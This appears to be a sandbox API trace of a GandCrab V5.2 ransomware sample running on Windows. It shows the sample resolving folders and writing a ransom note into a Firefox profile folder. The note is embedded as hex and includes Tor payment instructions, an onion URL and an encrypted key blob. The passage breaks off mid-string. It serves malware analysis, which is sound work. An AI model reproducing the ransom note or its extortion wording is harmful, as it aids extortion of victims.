[0083.065] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0083.065] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0083.065] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0083.066] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0083.066] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0083.066] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0083.066] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.066] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.066] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\\\TITWMVJL-DECRYPT.txt") returned 111 [0083.066] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\minidumps\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0083.067] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x4